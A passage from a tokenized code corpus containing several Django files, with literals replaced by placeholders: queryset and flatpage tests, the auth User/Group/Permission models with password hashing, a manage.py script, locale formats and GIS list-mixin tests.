'<STR_LIT>' , created = datetime . datetime . now ( ) ) <EOL> Article . objects . create ( name = '<STR_LIT>' , created = datetime . datetime . now ( ) ) <EOL> Article . objects . create ( name = '<STR_LIT>' , created = datetime . datetime . now ( ) ) <EOL> Article . objects . create ( name = '<STR_LIT>' , created = datetime . datetime . now ( ) ) <EOL> def test_tickets_7698_10202 ( self ) : <EOL> self . assertQuerysetEqual ( Article . objects . all ( ) [ <NUM_LIT:0> : <NUM_LIT:0> ] , [ ] ) <EOL> self . assertQuerysetEqual ( Article . objects . all ( ) [ <NUM_LIT:0> : <NUM_LIT:0> ] [ : <NUM_LIT:10> ] , [ ] ) <EOL> self . assertEqual ( Article . objects . all ( ) [ : <NUM_LIT:0> ] . count ( ) , <NUM_LIT:0> ) <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> '<STR_LIT>' , <EOL> Article . objects . all ( ) [ : <NUM_LIT:0> ] . latest , '<STR_LIT>' <EOL> ) <EOL> class EscapingTests ( TestCase ) : <EOL> def test_ticket_7302 ( self ) : <EOL> _ = ReservedName . objects . create ( name = '<STR_LIT:a>' , order = <NUM_LIT> ) <EOL> ReservedName . objects . create ( name = '<STR_LIT:b>' , order = <NUM_LIT> ) <EOL> self . assertQuerysetEqual ( <EOL> ReservedName . objects . all ( ) . order_by ( '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ReservedName . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT:name>' } , order_by = ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> class ToFieldTests ( TestCase ) : <EOL> def test_in_query ( self ) : <EOL> apple = Food . objects . create ( name = "<STR_LIT>" ) <EOL> pear = Food . objects . create ( name = "<STR_LIT>" ) <EOL> lunch = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> dinner = Eaten . objects . create ( food = pear , meal = "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> set ( Eaten . objects . filter ( food__in = [ apple , pear ] ) ) , <EOL> set ( [ lunch , dinner ] ) , <EOL> ) <EOL> def test_reverse_in ( self ) : <EOL> apple = Food . objects . create ( name = "<STR_LIT>" ) <EOL> pear = Food . objects . create ( name = "<STR_LIT>" ) <EOL> lunch_apple = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> lunch_pear = Eaten . objects . create ( food = pear , meal = "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> set ( Food . objects . filter ( eaten__in = [ lunch_apple , lunch_pear ] ) ) , <EOL> set ( [ apple , pear ] ) <EOL> ) <EOL> def test_single_object ( self ) : <EOL> apple = Food . objects . create ( name = "<STR_LIT>" ) <EOL> lunch = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> dinner = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> set ( Eaten . objects . filter ( food = apple ) ) , <EOL> set ( [ lunch , dinner ] ) <EOL> ) <EOL> def test_single_object_reverse ( self ) : <EOL> apple = Food . objects . create ( name = "<STR_LIT>" ) <EOL> lunch = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> set ( Food . objects . filter ( eaten = lunch ) ) , <EOL> set ( [ apple ] ) <EOL> ) <EOL> def test_recursive_fk ( self ) : <EOL> node1 = Node . objects . create ( num = <NUM_LIT> ) <EOL> node2 = Node . objects . create ( num = <NUM_LIT:1> , parent = node1 ) <EOL> self . assertEqual ( <EOL> list ( Node . objects . filter ( parent = node1 ) ) , <EOL> [ node2 ] <EOL> ) <EOL> def test_recursive_fk_reverse ( self ) : <EOL> node1 = Node . objects . create ( num = <NUM_LIT> ) <EOL> node2 = Node . objects . create ( num = <NUM_LIT:1> , parent = node1 ) <EOL> self . assertEqual ( <EOL> list ( Node . objects . filter ( node = node2 ) ) , <EOL> [ node1 ] <EOL> ) <EOL> if sys . version_info [ : <NUM_LIT:2> ] != ( <NUM_LIT:2> , <NUM_LIT:6> ) : <EOL> class OrderingLoopTests ( BaseQuerysetTest ) : <EOL> def setUp ( self ) : <EOL> generic = NamedCategory . objects . create ( name = "<STR_LIT>" ) <EOL> t1 = Tag . objects . create ( name = '<STR_LIT>' , category = generic ) <EOL> t2 = Tag . objects . create ( name = '<STR_LIT>' , parent = t1 , category = generic ) <EOL> t3 = Tag . objects . create ( name = '<STR_LIT>' , parent = t1 ) <EOL> t4 = Tag . objects . create ( name = '<STR_LIT>' , parent = t3 ) <EOL> t5 = Tag . objects . create ( name = '<STR_LIT>' , parent = t3 ) <EOL> def test_infinite_loop ( self ) : <EOL> self . assertRaisesMessage ( <EOL> FieldError , <EOL> '<STR_LIT>' , <EOL> lambda : list ( LoopX . objects . all ( ) ) <EOL> ) <EOL> self . assertRaisesMessage ( <EOL> FieldError , <EOL> '<STR_LIT>' , <EOL> lambda : list ( LoopZ . objects . all ( ) ) <EOL> ) <EOL> self . assertEqual ( len ( Tag . objects . order_by ( '<STR_LIT>' ) ) , <NUM_LIT:5> ) <EOL> self . assertQuerysetEqual ( <EOL> LoopX . objects . all ( ) . order_by ( '<STR_LIT>' ) , <EOL> [ ] <EOL> ) <EOL> if settings . DATABASES [ DEFAULT_DB_ALIAS ] [ '<STR_LIT>' ] == "<STR_LIT>" : <EOL> class GroupingTests ( TestCase ) : <EOL> def test_null_ordering_added ( self ) : <EOL> query = Tag . objects . values_list ( '<STR_LIT>' , flat = True ) . order_by ( ) . query <EOL> query . group_by = [ '<STR_LIT>' ] <EOL> sql = query . get_compiler ( DEFAULT_DB_ALIAS ) . as_sql ( ) [ <NUM_LIT:0> ] <EOL> fragment = "<STR_LIT>" <EOL> pos = sql . find ( fragment ) <EOL> self . assertEqual ( sql . find ( fragment , pos + <NUM_LIT:1> ) , - <NUM_LIT:1> ) <EOL> self . assertEqual ( sql . find ( "<STR_LIT>" , pos + len ( fragment ) ) , pos + len ( fragment ) ) <EOL> if settings . DATABASES [ DEFAULT_DB_ALIAS ] [ '<STR_LIT>' ] != "<STR_LIT>" : <EOL> class InLookupTests ( TestCase ) : <EOL> def test_ticket14244 ( self ) : <EOL> Number . objects . all ( ) . delete ( ) <EOL> numbers = range ( <NUM_LIT> ) <EOL> for num in numbers : <EOL> _ = Number . objects . create ( num = num ) <EOL> self . assertEqual ( <EOL> Number . objects . filter ( num__in = numbers [ : <NUM_LIT:1000> ] ) . count ( ) , <EOL> <NUM_LIT:1000> <EOL> ) <EOL> self . assertEqual ( <EOL> Number . objects . filter ( num__in = numbers [ : <NUM_LIT> ] ) . count ( ) , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertEqual ( <EOL> Number . objects . filter ( num__in = numbers [ : <NUM_LIT> ] ) . count ( ) , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertEqual ( <EOL> Number . objects . filter ( num__in = numbers ) . count ( ) , <EOL> <NUM_LIT> <EOL> ) </s>
<s> from django . conf . urls . defaults import * <EOL> from views import empty_view <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , empty_view , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , empty_view , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , empty_view , name = "<STR_LIT>" ) , <EOL> ) </s>
<s> import unittest <EOL> from django . utils . tzinfo import FixedOffset <EOL> class TzinfoTests ( unittest . TestCase ) : <EOL> def test_fixedoffset ( self ) : <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT:0> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> * <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> * <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> * <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> * <NUM_LIT> ) ) , '<STR_LIT>' ) </s>
<s> DATE_FORMAT = '<STR_LIT>' <EOL> TIME_FORMAT = '<STR_LIT>' <EOL> DATETIME_FORMAT = '<STR_LIT>' <EOL> YEAR_MONTH_FORMAT = '<STR_LIT>' <EOL> MONTH_DAY_FORMAT = '<STR_LIT>' <EOL> SHORT_DATE_FORMAT = '<STR_LIT>' <EOL> DECIMAL_SEPARATOR = '<STR_LIT:U+002C>' <EOL> THOUSAND_SEPARATOR = '<STR_LIT:.>' </s>
<s> from django . core . management import execute_manager <EOL> import imp <EOL> try : <EOL> imp . find_module ( '<STR_LIT>' ) <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> import settings <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> import datetime <EOL> import urllib <EOL> from django . contrib import auth <EOL> from django . contrib . auth . signals import user_logged_in <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . db import models <EOL> from django . db . models . manager import EmptyManager <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . utils . encoding import smart_str <EOL> from django . utils . hashcompat import md5_constructor , sha_constructor <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . crypto import constant_time_compare <EOL> UNUSABLE_PASSWORD = '<STR_LIT:!>' <EOL> def get_hexdigest ( algorithm , salt , raw_password ) : <EOL> """<STR_LIT>""" <EOL> raw_password , salt = smart_str ( raw_password ) , smart_str ( salt ) <EOL> if algorithm == '<STR_LIT>' : <EOL> try : <EOL> import crypt <EOL> except ImportError : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return crypt . crypt ( raw_password , salt ) <EOL> if algorithm == '<STR_LIT>' : <EOL> return md5_constructor ( salt + raw_password ) . hexdigest ( ) <EOL> elif algorithm == '<STR_LIT>' : <EOL> return sha_constructor ( salt + raw_password ) . hexdigest ( ) <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def check_password ( raw_password , enc_password ) : <EOL> """<STR_LIT>""" <EOL> algo , salt , hsh = enc_password . split ( '<STR_LIT:$>' ) <EOL> return constant_time_compare ( hsh , get_hexdigest ( algo , salt , raw_password ) ) <EOL> def update_last_login ( sender , user , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> user . last_login = datetime . datetime . now ( ) <EOL> user . save ( ) <EOL> user_logged_in . connect ( update_last_login ) <EOL> class SiteProfileNotAvailable ( Exception ) : <EOL> pass <EOL> class PermissionManager ( models . Manager ) : <EOL> def get_by_natural_key ( self , codename , app_label , model ) : <EOL> return self . get ( <EOL> codename = codename , <EOL> content_type = ContentType . objects . get_by_natural_key ( app_label , model ) <EOL> ) <EOL> class Permission ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> name = models . CharField ( _ ( '<STR_LIT:name>' ) , max_length = <NUM_LIT:50> ) <EOL> content_type = models . ForeignKey ( ContentType ) <EOL> codename = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:100> ) <EOL> objects = PermissionManager ( ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> unique_together = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( <EOL> unicode ( self . content_type . app_label ) , <EOL> unicode ( self . content_type ) , <EOL> unicode ( self . name ) ) <EOL> def natural_key ( self ) : <EOL> return ( self . codename , ) + self . content_type . natural_key ( ) <EOL> natural_key . dependencies = [ '<STR_LIT>' ] <EOL> class Group ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> name = models . CharField ( _ ( '<STR_LIT:name>' ) , max_length = <NUM_LIT> , unique = True ) <EOL> permissions = models . ManyToManyField ( Permission , verbose_name = _ ( '<STR_LIT>' ) , blank = True ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class UserManager ( models . Manager ) : <EOL> def create_user ( self , username , email , password = None ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . datetime . now ( ) <EOL> try : <EOL> email_name , domain_part = email . strip ( ) . split ( '<STR_LIT:@>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> email = '<STR_LIT:@>' . join ( [ email_name , domain_part . lower ( ) ] ) <EOL> user = self . model ( username = username , email = email , is_staff = False , <EOL> is_active = True , is_superuser = False , last_login = now , <EOL> date_joined = now ) <EOL> user . set_password ( password ) <EOL> user . save ( using = self . _db ) <EOL> return user <EOL> def create_superuser ( self , username , email , password ) : <EOL> u = self . create_user ( username , email , password ) <EOL> u . is_staff = True <EOL> u . is_active = True <EOL> u . is_superuser = True <EOL> u . save ( using = self . _db ) <EOL> return u <EOL> def make_random_password ( self , length = <NUM_LIT:10> , allowed_chars = '<STR_LIT>' ) : <EOL> "<STR_LIT>" <EOL> from random import choice <EOL> return '<STR_LIT>' . join ( [ choice ( allowed_chars ) for i in range ( length ) ] ) <EOL> def _user_get_all_permissions ( user , obj ) : <EOL> permissions = set ( ) <EOL> anon = user . is_anonymous ( ) <EOL> for backend in auth . get_backends ( ) : <EOL> if not anon or backend . supports_anonymous_user : <EOL> if hasattr ( backend , "<STR_LIT>" ) : <EOL> if obj is not None : <EOL> if backend . supports_object_permissions : <EOL> permissions . update ( <EOL> backend . get_all_permissions ( user , obj ) <EOL> ) <EOL> else : <EOL> permissions . update ( backend . get_all_permissions ( user ) ) <EOL> return permissions <EOL> def _user_has_perm ( user , perm , obj ) : <EOL> anon = user . is_anonymous ( ) <EOL> active = user . is_active <EOL> for backend in auth . get_backends ( ) : <EOL> if ( not active and not anon and backend . supports_inactive_user ) or ( not anon or backend . supports_anonymous_user ) : <EOL> if hasattr ( backend , "<STR_LIT>" ) : <EOL> if obj is not None : <EOL> if ( backend . supports_object_permissions and <EOL> backend . has_perm ( user , perm , obj ) ) : <EOL> return True <EOL> else : <EOL> if backend . has_perm ( user , perm ) : <EOL> return True <EOL> return False <EOL> def _user_has_module_perms ( user , app_label ) : <EOL> anon = user . is_anonymous ( ) <EOL> active = user . is_active <EOL> for backend in auth . get_backends ( ) : <EOL> if ( not active and not anon and backend . supports_inactive_user ) or ( not anon or backend . supports_anonymous_user ) : <EOL> if hasattr ( backend , "<STR_LIT>" ) : <EOL> if backend . has_module_perms ( user , app_label ) : <EOL> return True <EOL> return False <EOL> class User ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> username = models . CharField ( _ ( '<STR_LIT:username>' ) , max_length = <NUM_LIT:30> , unique = True , help_text = _ ( "<STR_LIT>" ) ) <EOL> first_name = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:30> , blank = True ) <EOL> last_name = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:30> , blank = True ) <EOL> email = models . EmailField ( _ ( '<STR_LIT>' ) , blank = True ) <EOL> password = models . CharField ( _ ( '<STR_LIT:password>' ) , max_length = <NUM_LIT> , help_text = _ ( "<STR_LIT>" ) ) <EOL> is_staff = models . BooleanField ( _ ( '<STR_LIT>' ) , default = False , help_text = _ ( "<STR_LIT>" ) ) <EOL> is_active = models . BooleanField ( _ ( '<STR_LIT>' ) , default = True , help_text = _ ( "<STR_LIT>" ) ) <EOL> is_superuser = models . BooleanField ( _ ( '<STR_LIT>' ) , default = False , help_text = _ ( "<STR_LIT>" ) ) <EOL> last_login = models . DateTimeField ( _ ( '<STR_LIT>' ) , default = datetime . datetime . now ) <EOL> date_joined = models . DateTimeField ( _ ( '<STR_LIT>' ) , default = datetime . datetime . now ) <EOL> groups = models . ManyToManyField ( Group , verbose_name = _ ( '<STR_LIT>' ) , blank = True , <EOL> help_text = _ ( "<STR_LIT>" ) ) <EOL> user_permissions = models . ManyToManyField ( Permission , verbose_name = _ ( '<STR_LIT>' ) , blank = True ) <EOL> objects = UserManager ( ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT:user>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return self . username <EOL> def get_absolute_url ( self ) : <EOL> return "<STR_LIT>" % urllib . quote ( smart_str ( self . username ) ) <EOL> def is_anonymous ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def is_authenticated ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def get_full_name ( self ) : <EOL> "<STR_LIT>" <EOL> full_name = u'<STR_LIT>' % ( self . first_name , self . last_name ) <EOL> return full_name . strip ( ) <EOL> def set_password ( self , raw_password ) : <EOL> if raw_password is None : <EOL> self . set_unusable_password ( ) <EOL> else : <EOL> import random <EOL> algo = '<STR_LIT>' <EOL> salt = get_hexdigest ( algo , str ( random . random ( ) ) , str ( random . random ( ) ) ) [ : <NUM_LIT:5> ] <EOL> hsh = get_hexdigest ( algo , salt , raw_password ) <EOL> self . password = '<STR_LIT>' % ( algo , salt , hsh ) <EOL> def check_password ( self , raw_password ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:$>' not in self . password : <EOL> is_correct = ( self . password == get_hexdigest ( '<STR_LIT>' , '<STR_LIT>' , raw_password ) ) <EOL> if is_correct : <EOL> self . set_password ( raw_password ) <EOL> self . save ( ) <EOL> return is_correct <EOL> return check_password ( raw_password , self . password ) <EOL> def set_unusable_password ( self ) : <EOL> self . password = UNUSABLE_PASSWORD <EOL> def has_usable_password ( self ) : <EOL> if self . password is None or self . password == UNUSABLE_PASSWORD : <EOL> return False <EOL> else : <EOL> return True <EOL> def get_group_permissions ( self , obj = None ) : <EOL> """<STR_LIT>""" <EOL> permissions = set ( ) <EOL> for backend in auth . get_backends ( ) : <EOL> if hasattr ( backend , "<STR_LIT>" ) : <EOL> if obj is not None : <EOL> if backend . supports_object_permissions : <EOL> permissions . update ( <EOL> backend . get_group_permissions ( self , obj ) <EOL> ) <EOL> else : <EOL> permissions . update ( backend . get_group_permissions ( self ) ) <EOL> return permissions <EOL> def get_all_permissions ( self , obj = None ) : <EOL> return _user_get_all_permissions ( self , obj ) <EOL> def has_perm ( self , perm , obj = None ) : <EOL> """<STR_LIT>""" <EOL> if self . is_active and self . is_superuser : <EOL> return True <EOL> return _user_has_perm ( self , perm , obj ) <EOL> def has_perms ( self , perm_list , obj = None ) : <EOL> """<STR_LIT>""" <EOL> for perm in perm_list : <EOL> if not self . has_perm ( perm , obj ) : <EOL> return False <EOL> return True <EOL> def has_module_perms ( self , app_label ) : <EOL> """<STR_LIT>""" <EOL> if self . is_active and self . is_superuser : <EOL> return True <EOL> return _user_has_module_perms ( self , app_label ) <EOL> def get_and_delete_messages ( self ) : <EOL> messages = [ ] <EOL> for m in self . message_set . all ( ) : <EOL> messages . append ( m . message ) <EOL> m . delete ( ) <EOL> return messages <EOL> def email_user ( self , subject , message , from_email = None ) : <EOL> "<STR_LIT>" <EOL> from django . core . mail import send_mail <EOL> send_mail ( subject , message , from_email , [ self . email ] ) <EOL> def get_profile ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> from django . conf import settings <EOL> if not getattr ( settings , '<STR_LIT>' , False ) : <EOL> raise SiteProfileNotAvailable ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> try : <EOL> app_label , model_name = settings . AUTH_PROFILE_MODULE . split ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> raise SiteProfileNotAvailable ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> try : <EOL> model = models . get_model ( app_label , model_name ) <EOL> if model is None : <EOL> raise SiteProfileNotAvailable ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _profile_cache = model . _default_manager . using ( self . _state . db ) . get ( user__id__exact = self . id ) <EOL> self . _profile_cache . user = self <EOL> except ( ImportError , ImproperlyConfigured ) : <EOL> raise SiteProfileNotAvailable <EOL> return self . _profile_cache <EOL> def _get_message_set ( self ) : <EOL> import warnings <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> category = DeprecationWarning ) <EOL> return self . _message_set <EOL> message_set = property ( _get_message_set ) <EOL> class Message ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> user = models . ForeignKey ( User , related_name = '<STR_LIT>' ) <EOL> message = models . TextField ( _ ( '<STR_LIT:message>' ) ) <EOL> def __unicode__ ( self ) : <EOL> return self . message <EOL> class AnonymousUser ( object ) : <EOL> id = None <EOL> username = '<STR_LIT>' <EOL> is_staff = False <EOL> is_active = False <EOL> is_superuser = False <EOL> _groups = EmptyManager ( ) <EOL> _user_permissions = EmptyManager ( ) <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __unicode__ ( self ) : <EOL> return '<STR_LIT>' <EOL> def __str__ ( self ) : <EOL> return unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __hash__ ( self ) : <EOL> return <NUM_LIT:1> <EOL> def save ( self ) : <EOL> raise NotImplementedError <EOL> def delete ( self ) : <EOL> raise NotImplementedError <EOL> def set_password ( self , raw_password ) : <EOL> raise NotImplementedError <EOL> def check_password ( self , raw_password ) : <EOL> raise NotImplementedError <EOL> def _get_groups ( self ) : <EOL> return self . _groups <EOL> groups = property ( _get_groups ) <EOL> def _get_user_permissions ( self ) : <EOL> return self . _user_permissions <EOL> user_permissions = property ( _get_user_permissions ) <EOL> def get_group_permissions ( self , obj = None ) : <EOL> return set ( ) <EOL> def get_all_permissions ( self , obj = None ) : <EOL> return _user_get_all_permissions ( self , obj = obj ) <EOL> def has_perm ( self , perm , obj = None ) : <EOL> return _user_has_perm ( self , perm , obj = obj ) <EOL> def has_perms ( self , perm_list , obj = None ) : <EOL> for perm in perm_list : <EOL> if not self . has_perm ( perm , obj ) : <EOL> return False <EOL> return True <EOL> def has_module_perms ( self , module ) : <EOL> return _user_has_module_perms ( self , module ) <EOL> def get_and_delete_messages ( self ) : <EOL> return [ ] <EOL> def is_anonymous ( self ) : <EOL> return True <EOL> def is_authenticated ( self ) : <EOL> return False </s>
<s> import os <EOL> from django . conf import settings <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . flatpages . models import FlatPage <EOL> from django . test import TestCase <EOL> class FlatpageViewTests ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> urls = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . old_MIDDLEWARE_CLASSES = settings . MIDDLEWARE_CLASSES <EOL> flatpage_middleware_class = '<STR_LIT>' <EOL> if flatpage_middleware_class in settings . MIDDLEWARE_CLASSES : <EOL> settings . MIDDLEWARE_CLASSES = tuple ( m for m in settings . MIDDLEWARE_CLASSES if m != flatpage_middleware_class ) <EOL> self . old_TEMPLATE_DIRS = settings . TEMPLATE_DIRS <EOL> settings . TEMPLATE_DIRS = ( <EOL> os . path . join ( <EOL> os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> self . old_LOGIN_URL = settings . LOGIN_URL <EOL> settings . LOGIN_URL = '<STR_LIT>' <EOL> def tearDown ( self ) : <EOL> settings . MIDDLEWARE_CLASSES = self . old_MIDDLEWARE_CLASSES <EOL> settings . TEMPLATE_DIRS = self . old_TEMPLATE_DIRS <EOL> settings . LOGIN_URL = self . old_LOGIN_URL <EOL> def test_view_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> def test_view_non_existent_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_view_authenticated_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertRedirects ( response , '<STR_LIT>' ) <EOL> User . objects . create_user ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> def test_fallback_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_fallback_non_existent_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_view_flatpage_special_chars ( self ) : <EOL> "<STR_LIT>" <EOL> fp = FlatPage . objects . create ( <EOL> url = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> content = "<STR_LIT>" , <EOL> enable_comments = False , <EOL> registration_required = False , <EOL> ) <EOL> fp . sites . add ( settings . SITE_ID ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertContains ( response , "<STR_LIT>" ) </s>
<s> from django . contrib . gis . geos . mutable_list import ListMixin <EOL> from django . utils import unittest <EOL> class UserListA ( ListMixin ) : <EOL> _mytype = tuple <EOL> def __init__ ( self , i_list , * args , ** kwargs ) : <EOL> self . _list = self . _mytype ( i_list ) <EOL> super ( UserListA , self ) . __init__ ( * args , ** kwargs ) <EOL> def __len__ ( self ) : return len ( self . _list ) <EOL> def __str__ ( self ) : return str ( self . _list ) <EOL> def __repr__ ( self ) : return repr ( self . _list ) <EOL> def _set_list ( self , length , items ) : <EOL> itemList = [ '<STR_LIT:x>' ] * length <EOL> for i , v in enumerate ( items ) : <EOL> itemList [ i ] = v <EOL> self . _list = self . _mytype ( itemList ) <EOL> def _get_single_external ( self , index ) : <EOL> return self . _list [ index ] <EOL> class UserListB ( UserListA ) : <EOL> _mytype = list <EOL> def _set_single ( self , index , value ) : <EOL> self . _list [ index ] = value <EOL> def nextRange ( length ) : <EOL> nextRange . start += <NUM_LIT:100> <EOL> return range ( nextRange . start , nextRange . start + length ) <EOL> nextRange . start = <NUM_LIT:0> <EOL> class ListMixinTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> limit = <NUM_LIT:3> <EOL> listType = UserListA <EOL> def lists_of_len ( self , length = None ) : <EOL> if length is None : length = self . limit <EOL> pl = range ( length ) <EOL> return pl , self . listType ( pl ) <EOL> def limits_plus ( self , b ) : <EOL> return range ( - self . limit - b , self . limit + b ) <EOL> def step_range ( self ) : <EOL> return range ( - <NUM_LIT:1> - self . limit , <NUM_LIT:0> ) + range ( <NUM_LIT:1> , <NUM_LIT:1> + self . limit ) <EOL> def test01_getslice ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> for i in self . limits_plus ( <NUM_LIT:1> ) : <EOL> self . assertEqual ( pl [ i : ] , ul [ i : ] , '<STR_LIT>' % ( i ) ) <EOL> self . assertEqual ( pl [ : i ] , ul [ : i ] , '<STR_LIT>' % ( i ) ) <EOL> for j in self . limits_plus ( <NUM_LIT:1> ) : <EOL> self . assertEqual ( pl [ i : j ] , ul [ i : j ] , '<STR_LIT>' % ( i , j ) ) <EOL> for k in self . step_range ( ) : <EOL> self . assertEqual ( pl [ i : j : k ] , ul [ i : j : k ] , '<STR_LIT>' % ( i , j , k ) ) <EOL> for k in self . step_range ( ) : <EOL> self . assertEqual ( pl [ i : : k ] , ul [ i : : k ] , '<STR_LIT>' % ( i , k ) ) <EOL> self . assertEqual ( pl [ : i : k ] , ul [ : i : k ] , '<STR_LIT>' % ( i , k ) ) <EOL> for k in self . step_range ( ) : <EOL> self . assertEqual ( pl [ : : k ] , ul [ : : k ] , '<STR_LIT>' % ( k ) ) <EOL> def test02_setslice ( self ) : <EOL> '<STR_LIT>' <EOL> def setfcn ( x , i , j , k , L ) : x [ i : j : k ] = range ( L ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> for slen in range ( self . limit + <NUM_LIT:1> ) : <EOL> ssl = nextRange ( slen ) <EOL> ul [ : ] = ssl <EOL> pl [ : ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' ) <EOL> for i in self . limits_plus ( <NUM_LIT:1> ) : <EOL> ssl = nextRange ( slen ) <EOL> ul [ i : ] = ssl <EOL> pl [ i : ] = ssl <EOL> self . assertEqual 